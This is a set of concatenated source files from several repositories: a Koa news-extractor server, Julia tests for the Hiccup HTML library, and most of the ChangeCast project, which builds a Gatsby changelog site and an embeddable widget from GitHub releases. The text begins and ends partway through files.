>https://www.theguardian.com/sport/2019/oct/03/mlb-playoff-preview-will-the-dodgers-finally-hold-their-nerve</a
>
<button
onclick="handleClickOpenUrl('https://www.theguardian.com/sport/2019/oct/03/mlb-playoff-preview-will-the-dodgers-finally-hold-their-nerve')"
>
extractor
</button>
</li>
</ul>
<h3>or</h3>
<div>
<input
id="input"
type="text"
placeholder="Enter a news url"
style="width: 200px"
/>
<button onclick="handleClickOpenUrl(document.querySelector('#input').value)">
extractor
</button>
</div>
<script>
const handleClickOpenUrl = value => {
window.open('http://' + location.host + '/go?url=' + value)
}
</script>
</div>
`
})
router.get('/go', async (ctx, next) => {
const {
query: { url }
} = ctx.request
if (!url || !url.startsWith('http')) {
ctx.throw(400)
}
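  // node-fetch's textConverted() decodes the body using the charset the page declares (headers/meta), which matters for non-UTF-8 news sites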
const body = await fetch(url).then(res => res.textConverted())
const gne = new GeneralNewsExtractor()
const result = gne.extract(body)
result.source = url
ctx.body = JSON.stringify(result, null, 4)
})
app.use(router.routes()).use(router.allowedMethods())
// app.listen(3000)
module.exports = app.callback()
| zenghongtu/general-news-extractor-js |
<|start_filename|>test/runtests.jl<|end_filename|>
using Hiccup
using Test
@tags br, link
# hiccup div conflicts with main div, so use this as a compromise
ediv = Hiccup.div
@test occursin("class=\"class1 class2\"", sprint(Hiccup.render, Node(:img, "#id.class1.class2", Dict(:src=>"http://www.com"))))
classMatching = ((".section-title", "section-title"),
(".test", "test"),
(".test1.test2", "test1 test2"),
(".-test", "-test"),
(".-test1.-test2", "-test1 -test2"),
("#.test", "test"),
("#.test1-hyphen", "test1-hyphen"),
("#.test1-hyphen.test2", "test1-hyphen test2"),
("#id.test1.test2", "test1 test2"),
("#id.test1.-test2", "test1 -test2"),
("#id.test1.-test-2", "test1 -test-2"),
("#id.test-hyphen", "test-hyphen"),
("#id.-test", "-test"),
("#id.-test.test2", "-test test2"),
("#id.-test.-test2", "-test -test2"))
for (in, expected) in classMatching
@test occursin(expected, sprint(Hiccup.render, Hiccup.div(in, "contents")))
end
# tests for void tags
@test string(br()) == "<br />"
@test string(img(".image-test", [])) == "<img class=\"image-test\" />"
@test occursin(
"/>",
string(link(Dict(:rel => "stylesheet", :href => "test.css"))))
@test_throws ArgumentError img(strong(".test", "test"))
# tests for normal tags
@test string(ediv(ediv(ediv()))) == "<div><div><div></div></div></div>"
# test escapes
@test string(Node(:pre, "<p>fish & chips</p>")) ==
"<pre><p>fish &amp; chips</p></pre>"
@test string(Node(:a, "link", href="http://example.com/test?a&b")) ==
"<a href=\"http://example.com/test?a&b\">link</a>"
| UnofficialJuliaMirror/Hiccup.jl-9fb69e20-1954-56bb-a84f-559cc56a8ff7 |
<|start_filename|>site/src/components/Button/Button.js<|end_filename|>
import React from 'react'
export const buttonStyles = {
border: '2px solid transparent',
borderRadius: '4px',
margin: 0,
padding: '0.35rem',
width: 'auto',
minWidth: 'auto',
overflow: 'visible',
background: 'transparent',
color: 'inherit',
font: 'inherit',
lineHeight: 'normal',
  WebkitAppearance: 'none',
cursor: 'pointer',
display: 'inline-flex',
alignItems: 'center',
transition: 'background 200ms ease, transform 200ms ease',
':hover': {
textDecoration: 'none',
background: 'rgba(0, 0, 0, 0.1)',
},
}
export const Button = React.forwardRef((props, ref) => (
<button ref={ref} css={buttonStyles} {...props} />
))
<|start_filename|>widget/src/styles.css<|end_filename|>
.notification {
display: inline-block;
border-radius: 50%;
width: 22px;
height: 22px;
background-color: #ff3e43;
position: absolute;
right: -10px;
top: -10px;
color: #f7f7f7;
font-size: 11px;
text-align: center;
line-height: 22px;
font-weight: bold;
opacity: 1;
letter-spacing: 0;
animation: growIn 500ms cubic-bezier(0.175, 0.985, 0.1, 1.035);
}
.iframe {
opacity: 1;
position: fixed;
height: 100vh;
width: 100vw;
top: 0;
right: 0;
margin: 0;
padding: 0;
border: none;
box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
animation: slideOut 500ms cubic-bezier(0.175, 0.985, 0.1, 1.035);
}
.iframeOpen {
transform: translateX(0);
animation: slideIn 500ms cubic-bezier(0.175, 0.985, 0.1, 1.035);
}
.iframeHidden {
opacity: 0;
pointer-events: none;
}
.overlay {
height: 100%;
width: 100%;
background: black;
opacity: 0;
top: 0;
left: 0;
position: fixed;
transition: opacity 350ms linear;
}
.overlayOpen {
opacity: 0.5;
visibility: visible;
}
.overlayHidden {
visibility: hidden;
}
@media (min-width: 800px) {
.iframe {
width: 399px;
}
}
@keyframes slideIn {
from {
transform: translateX(100%);
}
to {
transform: translateX(0);
}
}
@keyframes slideOut {
from {
transform: translateX(0);
}
to {
transform: translateX(100%);
}
}
@keyframes growIn {
from {
transform: scale(0.1);
}
to {
transform: scale(1);
}
}
<|start_filename|>site/src/components/Tag.js<|end_filename|>
import React from 'react'
export const Tag = ({ children, ...rest }) => (
<span
css={{
backgroundColor: '#ff3e43',
color: 'white',
borderRadius: 4,
display: 'inline-block',
fontSize: 12,
fontWeight: 600,
letterSpacing: 'normal',
paddingLeft: '0.5rem',
paddingRight: '0.5rem',
textAlign: 'center',
textTransform: 'uppercase',
}}
{...rest}
>
{children}
</span>
)
<|start_filename|>package.json<|end_filename|>
{
"name": "changecast",
"private": true,
"license": "MIT",
"scripts": {
"build": "yarn build:widget && yarn build:site",
"build:site": "cd site && yarn build",
"build:widget": "cd widget && yarn build",
"build:docs": "cd docs && yarn build",
"postinstall": "patch-package",
"now-build": "yarn build"
},
"devDependencies": {
"patch-package": "^6.0.5",
"postinstall-postinstall": "^2.0.0"
},
"workspaces": {
"packages": [
"docs",
"site",
"widget",
"icons"
]
},
"prettier": {
"semi": false,
"singleQuote": true,
"trailingComma": "es5"
}
}
<|start_filename|>site/gatsby-node.js<|end_filename|>
const path = require('path')
const fs = require('fs')
const { createRemoteFileNode } = require(`gatsby-source-filesystem`)
let releaseEdges
exports.createPages = async ({ graphql, actions: { createPage } }) => {
const releaseTemplate = path.resolve('./src/templates/ReleaseTemplate.js')
const releasesTemplate = path.resolve('./src/templates/ReleasesTemplate.js')
const query = `
{
site {
siteMetadata {
title
}
}
repository: allGithubRepo {
edges {
node {
name
}
}
}
releases: allGithubRelease(filter: { draft: { eq: false } }) {
edges {
node {
name
tagName
publishedAt
}
}
}
}
`
const result = await graphql(query)
releaseEdges = result.data.releases.edges
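  // create one page per published (non-draft) release, addressed by its tag name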
result.data.releases.edges.forEach(({ node: { name, tagName } }) => {
createPage({
path: `/${tagName}`,
component: releaseTemplate,
context: {
ogText: name || tagName,
tagName,
},
})
})
const ogText =
result.data.site.siteMetadata.title ||
result.data.repository.edges[0].node.name
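  // the index page and /widget share the same template; the isWidget context flag switches between the standalone site and the embedded widget layout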
createPage({
path: `/`,
component: releasesTemplate,
context: {
ogText,
isWidget: false,
},
})
createPage({
path: `/widget`,
component: releasesTemplate,
context: {
ogText,
isWidget: true,
},
})
}
exports.sourceNodes = async ({
store,
cache,
createNodeId,
actions: { createNode },
}) => {
if (process.env.LOGO_URL) {
await createRemoteFileNode({
url: process.env.LOGO_URL,
store,
cache,
createNode,
createNodeId,
name: 'logo',
})
}
}
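// write the publish dates of the first ten releases to public/release-dates.json; the embed widget fetches this file to compute its unread-notification count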
exports.onPostBuild = () =>
fs.writeFileSync(
path.resolve(process.cwd(), 'public', 'release-dates.json'),
JSON.stringify(
releaseEdges.slice(0, 10).map(({ node: { publishedAt } }) => publishedAt)
)
)
<|start_filename|>docs/src/components/Button/Button.js<|end_filename|>
import React from 'react'
export const buttonStyles = {
color: 'white',
display: 'inline-block',
verticalAlign: 'bottom',
position: 'relative',
padding: '12px 20px 12px',
border: '2px solid transparent',
borderRadius: '4px',
fontWeight: '700',
userSelect: 'none',
textAlign: 'center',
textDecoration: 'none',
cursor: 'pointer',
whiteSpace: 'nowrap',
transition: 'background 200ms ease, transform 200ms ease',
':hover': {
background: 'rgba(0, 0, 0, 0.1)',
},
}
export const Button = props => <button css={buttonStyles} {...props} />
<|start_filename|>site/package.json<|end_filename|>
{
"name": "changecast-site",
"private": true,
"description": "ChangeCast site generated from Github releases.",
"version": "0.1.0",
"author": "<NAME> <<EMAIL>>",
"license": "MIT",
"scripts": {
"build": "gatsby build",
"develop": "gatsby develop",
"serve": "gatsby serve"
},
"dependencies": {
"@babel/core": "^7.0.0-0",
"@emotion/core": "^10.0.7",
"@reach/menu-button": "0.1.7",
"@reach/tooltip": "^0.1.3",
"@reach/visually-hidden": "^0.1.2",
"date-fns": "^1.30.1",
"dotenv": "^6.2.0",
"fbjs": "^1.0.0",
"fuse.js": "^3.4.4",
"gatsby": "^2.1.19",
"gatsby-image": "^2.0.29",
"gatsby-plugin-emotion": "4.0.1",
"gatsby-plugin-manifest": "^2.0.16",
"gatsby-plugin-offline": "^2.0.22",
"gatsby-plugin-react-helmet": "^3.0.5",
"gatsby-plugin-sharp": "^2.0.19",
"gatsby-plugin-typography": "^2.2.10",
"gatsby-remark-external-links": "^0.0.4",
"gatsby-remark-gemoji-to-emoji": "^1.0.0",
"gatsby-remark-images": "file:../plugins/gatsby-remark-images",
"gatsby-remark-prismjs": "^3.2.4",
"gatsby-source-filesystem": "^2.0.27",
"gatsby-source-github-releases": "file:../plugins/gatsby-source-github-releases",
"gatsby-transformer-color-thief": "file:../plugins/gatsby-transformer-color-thief",
"gatsby-transformer-favicons": "file:../plugins/gatsby-transformer-favicons",
"gatsby-transformer-json": "^2.1.8",
"gatsby-transformer-og-image": "file:../plugins/gatsby-transformer-og-image",
"gatsby-transformer-remark": "^2.2.2",
"gatsby-transformer-remark-plaintext": "^1.0.3",
"gatsby-transformer-sharp": "^2.1.13",
"hex-rgb": "^4.0.0",
"icons": "0.1.0",
"js-search": "^1.4.2",
"just-debounce-it": "^1.1.0",
"mark.js": "^8.11.1",
"normalize.css": "^8.0.1",
"object-assign": "^4.1.1",
"prismjs": "^1.15.0",
"prop-types": "^15.7.2",
"react": "^16.8.1",
"react-dom": "^16.8.1",
"react-helmet": "^5.2.0",
"react-typography": "^0.16.19",
"react-waypoint": "^8.1.0",
"typography": "^0.16.19"
}
}
<|start_filename|>icons/Radio.js<|end_filename|>
import React from 'react'
export const Radio = props => (
<svg
width={24}
height={24}
viewBox="0 0 24 24"
fill="none"
stroke="currentColor"
strokeWidth={2}
strokeLinecap="round"
strokeLinejoin="round"
className="Radio_svg__feather Radio_svg__feather-radio"
{...props}
>
<circle cx={12} cy={12} r={2} />
<path d="M16.24 7.76a6 6 0 0 1 0 8.49m-8.48-.01a6 6 0 0 1 0-8.49m11.31-2.82a10 10 0 0 1 0 14.14m-14.14 0a10 10 0 0 1 0-14.14" />
</svg>
)
<|start_filename|>site/src/components/Button/MenuButton.js<|end_filename|>
import { keyframes } from '@emotion/core'
import {
Menu,
MenuButton as ReachMenuButton,
MenuItem as ReachMenuItem,
MenuLink as ReachMenuLink,
MenuList as ReachMenuList,
} from '@reach/menu-button'
import React from 'react'
import { theme } from '../../styles/theme'
export const MenuButton = props => (
<ReachMenuButton
css={{
display: 'block',
border: 'none',
margin: 0,
padding: 0,
cursor: 'pointer',
      background: 'transparent',
      /* inherit font from ancestor */
      font: 'inherit',
      /* Normalize `line-height`. Cannot be changed from `normal` in Firefox 4+. */
      lineHeight: 'normal',
      /* Corrects inability to style clickable `input` types in iOS */
      WebkitAppearance: 'none',
transition: 'color 100ms ease-in',
color: theme.color.accent,
':hover': {
color: theme.color.text,
},
}}
{...props}
/>
)
const fadeInScaleUp = keyframes`
0% {
opacity: 0;
transform: scale(.5) translateY(-25px)
}
100% {
opacity: 1;
transform: scale(1) translateY(0px)
}
`
export const MenuList = props => (
<ReachMenuList
css={{
position: 'relative',
border: `1px solid lightgray`,
animation: `${fadeInScaleUp} 150ms cubic-bezier(.2,0,.13,1.5)`,
padding: '5px 0',
fontSize: '1rem',
borderRadius: 3,
background: 'white',
boxShadow: '0 3px 12px rgba(27,31,35,.15)',
}}
{...props}
/>
)
export const menuItemStyles = {
padding: '4px 15px 4px 10px',
display: 'flex',
alignItems: 'center',
}
export const MenuItem = props => (
<ReachMenuItem css={menuItemStyles} {...props} />
)
export const MenuLink = props => (
<ReachMenuLink css={menuItemStyles} {...props} />
)
export { Menu }
<|start_filename|>icons/AbstractIcon10.js<|end_filename|>
import React from 'react'
export const AbstractIcon10 = props => (
<svg width={40} height={40} viewBox="0 0 40 40" {...props}>
<defs>
<path id="AbstractIcon10_svg__a" d="M0 0h12v12H0z" />
</defs>
<g fill="none" fillRule="evenodd">
<circle fill="#E9F1FF" cx={20} cy={20} r={20} />
<use
fill="#4D61FC"
xlinkHref="#AbstractIcon10_svg__a"
transform="rotate(45 -4.243 30.728)"
/>
<path
fill="#00396B"
d="M17.834 14.652l8.485 8.485-3.182 3.182-8.485-8.485z"
/>
<path
fill="#EAF0FF"
d="M20.485 17.304l3.182 3.182-3.182 3.182-3.182-3.182z"
/>
</g>
</svg>
)
<|start_filename|>site/src/templates/ReleasesTemplate.js<|end_filename|>
import { Global } from '@emotion/core'
import { graphql } from 'gatsby'
import { Search, UnorderedSearchIndex } from 'js-search'
import debounce from 'just-debounce-it'
import Mark from 'mark.js'
import React from 'react'
import Helmet from 'react-helmet'
import Waypoint from 'react-waypoint'
import { Favicons } from '../components/Favicons'
import { FocusStyles } from '../components/FocusStyles'
import { Header } from '../components/Header'
import { Release } from '../components/Release/Release'
import { SiteWrapper } from '../components/SiteWrapper'
import { WidgetWrapper } from '../components/WidgetWrapper'
import { useSiteSetup } from '../hooks/useSiteSetup'
import { SiteProvider } from '../providers/SiteProvider'
import { WidgetContext, WidgetProvider } from '../providers/WidgetProvider'
import { globalStyles } from '../styles/global'
import { getOgImageSrc } from '../utils/data'
const ReleasesTemplate = ({
data,
data: {
releases: { edges },
},
pageContext: { isWidget },
}) => {
const Provider = isWidget ? WidgetProvider : SiteProvider
const Wrapper = isWidget ? WidgetWrapper : SiteWrapper
const ogImageSrc = getOgImageSrc(data)
const [releases, setReleases] = React.useState(edges)
const [releasesShown, setReleasesShown] = React.useState(10)
const [searchValue, setSearchValue] = React.useState('')
const search = React.useRef(null)
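  // lazily build the js-search index on first use and keep the debounced search handler in a ref so it survives re-renders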
function getReleaseSearch() {
if (search.current !== null) {
return search.current
}
const releaseSearch = new Search(['node', 'id'])
releaseSearch.searchIndex = new UnorderedSearchIndex()
releaseSearch.addIndex(['node', 'name'])
releaseSearch.addIndex(['node', 'tagName'])
releaseSearch.addIndex([
'node',
'childGithubReleaseBody',
'childMarkdownRemark',
'plainText',
])
releaseSearch.addDocuments(edges)
const debouncedReleaseSearch = debounce(value => {
setReleases(!!value ? releaseSearch.search(value) : edges)
}, 100)
search.current = value => {
setSearchValue(value)
debouncedReleaseSearch(value)
}
return search.current
}
const mark = React.useRef()
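  // re-run mark.js after each search so the current term stays highlighted in the freshly rendered release bodies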
React.useEffect(() => {
if (mark.current) {
mark.current.unmark()
}
mark.current = new Mark(document.querySelectorAll('.release'))
mark.current.mark(searchValue)
}, [releases])
const {
faviconElements,
primaryColor,
logoSrc,
title,
description,
homepage,
url,
htmlUrl,
} = useSiteSetup()
const siteTitle = `${title} changelog`
const ogImage = `${url}${ogImageSrc}`
return (
<Provider>
<Favicons favicons={faviconElements} />
<Global styles={globalStyles} />
<FocusStyles />
<Helmet
title={siteTitle}
meta={[
{ name: 'description', content: description },
{ property: 'og:title', content: siteTitle },
{
property: 'og:url',
content: url,
},
{
property: 'og:image',
content: ogImage,
},
{ name: 'twitter:card', content: 'summary_large_image' },
{
name: 'twitter:url',
content: url,
},
{ name: 'twitter:title', content: siteTitle },
{
name: 'twitter:image',
content: ogImage,
},
]}
/>
<Header
homepage={homepage}
htmlUrl={htmlUrl}
setSearchValue={getReleaseSearch()}
searchValue={searchValue}
logoSrc={logoSrc}
primaryColor={primaryColor}
isWidget={isWidget}
/>
<Wrapper>
{releases.length === 0 ? (
<div
css={{
display: 'flex',
justifyContent: 'center',
textAlign: 'center',
padding: '2rem',
}}
>
              We couldn't find any releases. Try a different search query.
</div>
) : (
releases
.slice(0, releasesShown)
.map(
({
node: {
id,
name,
tagName,
publishedAt,
childGithubReleaseBody: {
childMarkdownRemark: { html, plainText },
},
},
}) => (
<Release
key={id}
releaseName={name}
tagName={tagName}
publishedAt={publishedAt}
html={html}
plainText={plainText}
isWidget={isWidget}
primaryColor={primaryColor}
url={url}
searchValue={searchValue}
id={id}
/>
)
)
)}
<WidgetContext.Consumer>
{isOpen =>
isOpen &&
releasesShown < releases.length && (
<Waypoint
onEnter={() => setReleasesShown(count => count + 10)}
bottomOffset="-100%"
/>
)
}
</WidgetContext.Consumer>
</Wrapper>
</Provider>
)
}
export const query = graphql`
query ReleasesTemplateQuery($ogText: String!) {
repository: allGithubRepo {
edges {
node {
avatarImageFile: childFile {
childOgImage {
ogImageWithText(text: $ogText) {
src
}
}
}
}
}
}
logo: allFile(filter: { name: { eq: "logo" } }) {
edges {
node {
childOgImage {
ogImageWithText(text: $ogText) {
src
}
}
}
}
}
releases: allGithubRelease(filter: { draft: { eq: false } }) {
edges {
node {
id
name
tagName
publishedAt
childGithubReleaseBody {
childMarkdownRemark {
html
plainText
}
}
}
}
}
}
`
export default ReleasesTemplate
<|start_filename|>site/src/components/SiteWrapper.js<|end_filename|>
import React from 'react'
import { theme } from '../styles/theme'
export const SiteWrapper = React.forwardRef(({ children }, ref) => (
<main
ref={ref}
css={{
maxWidth: 800,
margin: '0 auto',
width: '100vw',
paddingTop: '4rem',
[theme.media.small]: {
padding: 'calc(0.5rem + 54px) 0.5rem 0.5rem 0.5rem',
},
}}
>
{children}
</main>
))
<|start_filename|>icons/AbstractIcon7.js<|end_filename|>
import React from 'react'
export const AbstractIcon7 = props => (
<svg width={40} height={40} viewBox="0 0 40 40" {...props}>
<g fill="none" fillRule="evenodd">
<circle fill="#E9F1FF" cx={20} cy={20} r={20} />
<path
fill="#4D61FC"
d="M28.686 14.008l-9 9.085-3.6-3.6-1.2 1.2 4.8 4.8L29.97 15.208z"
/>
<path
d="M25.086 16.208l-1.2-1.2-5.4 5.4 1.2 1.2 5.4-5.4zM11 20.693l4.8 4.8 1.2-1.2-4.8-4.8-1.2 1.2z"
fill="#00396B"
fillRule="nonzero"
/>
</g>
</svg>
)
<|start_filename|>icons/AbstractIcon2.js<|end_filename|>
import React from 'react'
export const AbstractIcon2 = props => (
<svg width={40} height={40} viewBox="0 0 40 40" {...props}>
<defs>
<path id="AbstractIcon2_svg__a" d="M4 4h6v6H4z" />
</defs>
<g fill="none" fillRule="evenodd">
<circle fill="#E9F1FF" cx={20} cy={20} r={20} />
<g transform="translate(13 13)">
<path fill="#4D61FC" d="M8 0h6v6H8zM0 8h6v6H0z" />
<use fill="#00396B" xlinkHref="#AbstractIcon2_svg__a" />
<path stroke="#E9F1FF" d="M3.5 3.5h7v7h-7z" />
</g>
</g>
</svg>
)
<|start_filename|>site/gatsby-config.js<|end_filename|>
const path = require('path')
const hexRgb = require('hex-rgb')
const { config } = require('dotenv')
config({ path: path.resolve('..', '.env') })
module.exports = {
siteMetadata: generateMetadata(),
plugins: [
'gatsby-plugin-emotion',
'gatsby-plugin-react-helmet',
'gatsby-plugin-sharp',
{
resolve: `gatsby-plugin-typography`,
options: {
pathToConfigModule: `src/styles/typography`,
},
},
{
resolve: 'gatsby-source-github-releases',
options: {
url: process.env.REPO_URL,
token: process.env.GITHUB_TOKEN,
},
},
'gatsby-transformer-json',
'gatsby-transformer-sharp',
'gatsby-transformer-color-thief',
{
resolve: 'gatsby-transformer-og-image',
options: {
fontPath: '../fonts/Inter-SemiBold.woff',
fontColor: '#24292e',
backgroundColor: '#f7f7f7',
},
},
'gatsby-transformer-favicons',
{
resolve: 'gatsby-transformer-remark',
options: {
plugins: [
{ resolve: 'gatsby-remark-images', options: { maxWidth: 800 } },
'gatsby-remark-prismjs',
'gatsby-remark-external-links',
'gatsby-remark-gemoji-to-emoji',
'gatsby-transformer-remark-plaintext',
],
},
},
],
}
function generateMetadata() {
// default to false for each since undefined fields cannot be queried
return {
title: process.env.SITE_TITLE || false,
primaryColor: process.env.PRIMARY_COLOR
? hexRgb(process.env.PRIMARY_COLOR, { format: 'array' })
: false,
url: process.env.DEPLOY_URL || process.env.URL || '',
}
}
<|start_filename|>icons/Link.js<|end_filename|>
import React from 'react'
export const Link = props => (
<svg
width={24}
height={24}
viewBox="0 0 24 24"
fill="none"
stroke="currentColor"
strokeWidth={2}
strokeLinecap="round"
strokeLinejoin="round"
className="Link_svg__feather Link_svg__feather-link"
{...props}
>
<path d="M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71" />
<path d="M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71" />
</svg>
)
<|start_filename|>site/src/utils/data.js<|end_filename|>
export function getPrimaryColor(data) {
if (data.site.siteMetadata.primaryColor) {
return data.site.siteMetadata.primaryColor
}
if (data.logo.edges[0]) {
return data.logo.edges[0].node.fields.colorPalette[0]
}
return data.repository.edges[0].node.avatarImageFile.fields.colorPalette[0]
}
export function getOgImageSrc(data) {
if (data.logo.edges[0]) {
return data.logo.edges[0].node.childOgImage.ogImageWithText.src
}
return data.repository.edges[0].node.avatarImageFile.childOgImage
.ogImageWithText.src
}
export function getLogoSrc(data) {
if (data.logo.edges[0]) {
return data.logo.edges[0].node.childImageSharp.original.src
}
return data.repository.edges[0].node.avatarImageFile.childImageSharp.original
.src
}
export function getTitle(data) {
if (data.site.siteMetadata.title) {
return data.site.siteMetadata.title
}
return data.repository.edges[0].node.name
}
export function getFaviconElements(data) {
if (data.logo.edges[0]) {
return data.logo.edges[0].node.childFavicon.faviconElements
}
return data.repository.edges[0].node.avatarImageFile.childFavicon
.faviconElements
}
<|start_filename|>docs/src/components/Anchor.js<|end_filename|>
import React from 'react'
export const Anchor = ({ children, ...props }) => (
<a
css={{ color: 'royalblue', ':visited': { color: 'royalblue' } }}
{...props}
>
{children}
</a>
)
<|start_filename|>docs/src/styles/global.js<|end_filename|>
import { css } from '@emotion/core'
import 'normalize.css'
import { fonts } from './typography'
export const globalStyles = css`
* {
box-sizing: border-box;
margin: 0;
padding: 0;
}
html {
height: 100%;
font-family: ${fonts.regular}, sans-serif;
font-style: normal;
line-height: 1.15;
text-rendering: optimizeLegibility;
-webkit-text-size-adjust: 100%;
-ms-text-size-adjust: 100%;
-ms-overflow-style: scrollbar;
-webkit-tap-highlight-color: rgba(0, 0, 0, 0);
}
*::-moz-selection,
*::-moz-selection {
color: white;
background-color: #4d61fc;
}
*::-moz-selection,
*::selection {
color: white;
background-color: #4d61fc;
}
body {
background-color: white;
color: #3d3d3d;
}
body.state-fixed-body {
overflow: hidden;
}
p {
margin-bottom: 1em;
margin-top: 1em;
line-height: 1.4;
}
hr {
box-sizing: content-box;
height: 0;
overflow: visible;
}
input,
button,
select,
optgroup,
textarea {
margin: 0;
}
button,
input {
border: none;
background: none;
overflow: visible;
}
button {
border-radius: 0;
}
h1,
h2,
h3,
h4,
h5,
h6 {
margin-bottom: 0.5em;
margin-top: 0.5em;
line-height: 1.3;
color: #303030;
}
`
<|start_filename|>icons/Clipboard.js<|end_filename|>
import React from 'react'
export const Clipboard = props => (
<svg
width={24}
height={24}
viewBox="0 0 24 24"
fill="none"
stroke="currentColor"
strokeWidth={2}
strokeLinecap="round"
strokeLinejoin="round"
className="Clipboard_svg__feather Clipboard_svg__feather-clipboard"
{...props}
>
<path d="M16 4h2a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H6a2 2 0 0 1-2-2V6a2 2 0 0 1 2-2h2" />
<rect x={8} y={2} width={8} height={4} rx={1} ry={1} />
</svg>
)
<|start_filename|>widget/src/widget.js<|end_filename|>
import createFocusTrap from 'focus-trap'
import { fetch } from 'whatwg-fetch'
import * as styles from './styles.css'
// configuration
const CHANGECAST_LOCALSTORAGE_KEY = `changecast-${process.env.REPO_HASH}`
const changeCastHost =
process.env.DEPLOY_URL ||
process.env.URL ||
document.currentScript.getAttribute('src').replace('/widget.js', '')
// find all toggles
const toggleSelectors =
document.currentScript.getAttribute('data-selectors') ||
'[data-toggle-changecast]'
const toggles = document.querySelectorAll(toggleSelectors)
function createWidget() {
// bail early if the widget has already been created
  if (document.querySelector(`.${styles.iframe}`)) {
return
}
// add click handlers to toggles
toggles.forEach(toggle => toggle.addEventListener('click', toggleChangeCast))
// create overlay
const overlay = document.createElement('div')
// create iframe
const iframe = document.createElement('iframe')
iframe.src = `${changeCastHost}/widget`
iframe.allowFullscreen = true
iframe.scrolling = 'no'
iframe.tabIndex = 0
iframe.setAttribute('role', 'dialog')
iframe.setAttribute('aria-label', 'ChangeCast Changelog')
iframe.setAttribute('aria-hidden', true)
iframe.setAttribute('tabindex', -1)
// hide overlay and iframe to start
overlay.className = `${styles.overlay} ${styles.overlayHidden}`
iframe.className = `${styles.iframe} ${styles.iframeHidden}`
document.body.appendChild(overlay)
document.body.appendChild(iframe)
let focusTrap = createFocusTrap(iframe, {
initialFocus: iframe,
})
// shared state
let open = false
let toggleNotifications = new Map()
function openChangeCast() {
open = true
iframe.contentWindow.postMessage('open', '*')
overlay.className = `${styles.overlay} ${styles.overlayOpen}`
iframe.className = `${styles.iframe} ${styles.iframeOpen}`
iframe.setAttribute('aria-hidden', false)
iframe.removeAttribute('tabindex')
focusTrap.activate()
window.addEventListener('click', toggleChangeCast, true)
window.localStorage.setItem(
CHANGECAST_LOCALSTORAGE_KEY,
new Date().toISOString()
)
if (toggleNotifications.size) {
toggles.forEach(toggle => {
toggle.removeChild(toggleNotifications.get(toggle))
toggleNotifications.delete(toggle)
})
}
}
function closeChangeCast() {
open = false
focusTrap.deactivate()
window.removeEventListener('click', toggleChangeCast, true)
overlay.className = styles.overlay
iframe.className = styles.iframe
iframe.setAttribute('aria-hidden', true)
iframe.setAttribute('tabindex', -1)
setTimeout(() => {
overlay.className = `${styles.overlay} ${styles.overlayHidden}`
iframe.className = `${styles.iframe} ${styles.iframeHidden}`
iframe.contentWindow.postMessage('close', '*')
}, 400)
}
function toggleChangeCast() {
if (open) {
closeChangeCast()
} else {
openChangeCast()
}
}
// listen for close events from the iframe
window.addEventListener(
'message',
event => {
if (event.origin === changeCastHost) {
closeChangeCast()
}
},
true
)
// notifications
const notification = document.createElement('span')
notification.setAttribute('data-changecast-notification', true)
notification.className = styles.notification
const toggleStyle = document.createElement('style')
document.head.appendChild(toggleStyle)
toggleStyle.sheet.insertRule(`${toggleSelectors} { position: relative; }`)
fetch(`${changeCastHost}/release-dates.json`)
.then(
res => res.json(),
err => {
// swallow error
}
)
.then(dates => {
const lastViewed = window.localStorage.getItem(
CHANGECAST_LOCALSTORAGE_KEY
)
if (lastViewed) {
const lastViewedDate = new Date(lastViewed)
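        // dates are expected newest-first: the index of the first entry at or before the last visit equals the number of releases published since then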
const lastViewedIndex = dates.findIndex(
date => new Date(date) <= lastViewedDate
)
const count = lastViewedIndex === -1 ? dates.length : lastViewedIndex
if (count > 0) {
notification.innerHTML = count > 9 ? `9+` : count
toggles.forEach(toggle => {
const notificationCopy = notification.cloneNode(true)
toggleNotifications.set(toggle, notificationCopy)
toggle.appendChild(notificationCopy)
})
}
} else {
window.localStorage.setItem(
CHANGECAST_LOCALSTORAGE_KEY,
new Date().toISOString()
)
}
})
}
window.addEventListener('load', createWidget)
<|start_filename|>icons/Facebook.js<|end_filename|>
import React from 'react'
export const Facebook = props => (
<svg
width={24}
height={24}
viewBox="0 0 24 24"
fill="none"
stroke="currentColor"
strokeWidth={2}
strokeLinecap="round"
strokeLinejoin="round"
className="Facebook_svg__feather Facebook_svg__feather-facebook"
{...props}
>
<path d="M18 2h-3a5 5 0 0 0-5 5v3H7v4h3v8h4v-8h3l1-4h-4V7a1 1 0 0 1 1-1h3z" />
</svg>
)
<|start_filename|>docs/src/components/Feature.js<|end_filename|>
import React from 'react'
export const Feature = ({ title, icon: Icon, children }) => (
<li
css={{
width: '30%',
maxWidth: 350,
marginBottom: 60,
padding: '0 15px',
'@media (max-width: 990px)': {
width: '50%',
},
'@media (max-width: 600px)': {
width: '100%',
},
}}
>
<h3
css={{
marginTop: '0',
marginBottom: 15,
}}
>
<span
css={{
fontSize: '1rem',
}}
>
{title}
</span>
</h3>
<p
css={{
margin: 'auto',
}}
>
{children}
</p>
</li>
)
<|start_filename|>site/src/utils/windowPopup.js<|end_filename|>
export function windowPopup(url, width, height) {
// Calculate the position of the popup so
// it’s centered on the screen.
var left = window.screen.width / 2 - width / 2,
top = window.screen.height / 2 - height / 2
window.open(
url,
'',
'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,width=' +
width +
',height=' +
height +
',top=' +
top +
',left=' +
left
)
}
<|start_filename|>docs/gatsby-browser.js<|end_filename|>
exports.onClientEntry = () => {
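  // backdate the "last viewed" timestamps for the demo changelogs so the example widgets show unread badges on a first visit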
const oneMonthAgo = new Date()
oneMonthAgo.setMonth(oneMonthAgo.getMonth() - 1)
const oneMonthAgoISO = oneMonthAgo.toISOString()
window.localStorage.setItem('changecast-077d7', oneMonthAgoISO)
window.localStorage.setItem('changecast-2c277', oneMonthAgoISO)
window.localStorage.setItem('changecast-ff975', oneMonthAgoISO)
}
<|start_filename|>icons/AbstractIcon1.js<|end_filename|>
import React from 'react'
export const AbstractIcon1 = props => (
<svg width={40} height={40} viewBox="0 0 40 40" {...props}>
<g fill="none" fillRule="evenodd">
<circle fill="#E9F1FF" cx={20} cy={20} r={20} />
<path fill="#4D61FC" d="M13 13h6v6h-6zM21 13h6v6h-6zm-8 8h6v6h-6z" />
<path fill="#00396B" d="M21 21h6v6h-6z" />
</g>
</svg>
)
<|start_filename|>site/src/providers/SiteProvider.js<|end_filename|>
import React from 'react'
